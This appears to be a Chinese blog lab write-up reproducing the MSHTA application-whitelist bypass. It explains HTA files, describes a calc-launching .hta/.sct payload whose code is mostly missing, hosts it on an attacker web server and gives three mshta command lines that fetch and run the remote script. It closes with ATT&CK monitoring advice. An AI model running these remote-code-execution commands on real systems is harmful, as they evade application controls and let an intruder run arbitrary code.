MSHTA命令执行——绕过应用白名单限制

最近复现了一个MSHTA命令执行的攻击,这里做个记录。

所需环境

这里使用了两台互相联通的电脑分别作为攻击机和靶机。

攻击机

  • Windows 10
  • phpstudy

靶机

  • Windows 10
  • powershell

背景&技术介绍

假设攻击者已经控制了一台内网主机,但是该主机存在应用白名单限制,因此,尝试通过MSHTA程序绕过限制。

百度百科对MSHTA简介如下:

mshta一般指mshta.exe。mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件。

百度百科对HTA的简介如下:

HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别。
HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多。它具有桌面程序的所有权限(读写文件、操作注册表等)。HTA本来就是被设计为桌面程序的。

而ATT&CK官网对该技术的原理说明如下:

攻击者可能会通过受信任的 Windows 实用程序滥用 mshta.exe 来代理恶意 .hta 文件和 Javascript 或 VBScript 的执行。
Mshta.exe 是一种执行 Microsoft HTML 应用程序 (HTA) 文件的实用程序。 HTA 是使用与 Internet Explorer 相同的模型和技术执行的独立应用程序,但在浏览器之外。
Mshta.exe 可用于绕过不考虑其潜在用途的应用程序控制解决方案。 由于 mshta.exe 在 Internet Explorer 的安全上下文之外执行,因此它还可绕过浏览器安全设置。

大概总结一下,该技术的原理为:

  • MSHTA是Windows内置的一个程序,主要用于执行HTA程序
  • MSHTA可以直接执行远端的HTA
  • HTA程序可以包括VBScript、JScript等代码,以此执行命令
  • 通过MSHTA运行HTA程序执行命令的方式,可以加载本地受限应用,以此绕过应用白名单限制
  • MSHTA在浏览器外部运行,因此也可绕过浏览器安全设置

攻击实施

编写恶意HTA程序

首先,编写恶意的HTA程序,保存为m.hta,hta文件内容如下:




 

    Nothing to see here..


HTA程序本质上是一个类似HTML的程序,但其中可以嵌入VBScript代码。
这里嵌入了一段VBScript代码,定义了一个程序,程序第一行创建一个shell对象,第二行利用该对象运行计算器程序(当然,VBScript能做的不仅仅是这些,这里只是以计算器做一个例子,如果想要实施更加复杂的攻击,将第二行的命令换成想要执行的shell脚本即可)

HTA还可以嵌入JScript脚本,因此,上面的程序也可以写成下面这样,但注意,需要保存为m.sct






    




其实现的功能和前一个文件一样,但这里是使用JScript建立一个ActiveX对象,再通过该对象运行命令

上线恶意程序

文件编写完毕之后,需要将其上线以方便后续攻击。

这里直接安装phpstudy,去官网下载傻瓜式安装即可,安装完毕后,会在安装目录下有一个www文件夹,将我们刚刚编写的恶意程序放进去即可。

然后打开phpstudy,启动所有服务,完成程序上线。

在靶机上运行命令

进入到靶机中,打开powershell,运行以下命令(其中的攻击机地址可以是IP或者域名):

mshta.exe http://攻击机地址/m.hta

或者命令:

/cmd /c mshta.exe javascript:a=(GetObject("script:http://攻击机地址/m.sct")).Exec();close();

或者命令:

mshta vbscript:Close(Execute("GetObject(""script:https[:]//攻击机地址/m[.]sct"")"))

攻击完成

攻击效果

可以看到,命令运行后,靶机电脑上的计算器程序就直接启动运行了:
(图后面再补)

如果将恶意的HTA程序中的脚本换成其他命令,则可以实施更加复杂且危险的攻击。

预防措施

在ATT&CK中也给出了一定的预防措施:

  • 使用进程监控来监控 mshta.exe 的执行和参数。 在命令行中查找执行原始或混淆脚本的 mshta.exe。 将最近对 mshta.exe 的调用与已知良好参数和已执行的 .hta 文件的先前历史进行比较,以确定异常和潜在的对抗活动。 在 mshta.exe 调用之前和之后使用的命令参数也可能有助于确定正在执行的 .hta 文件的来源和目的。
  • 监视 HTA 文件的使用。 如果它们通常不在环境中使用,则它们的执行可能是可疑的

参考资料

  • MSHTA教程
  • ATT&CK关于MSHTA的介绍

你可能感兴趣的:(MSHTA命令执行——绕过应用白名单限制)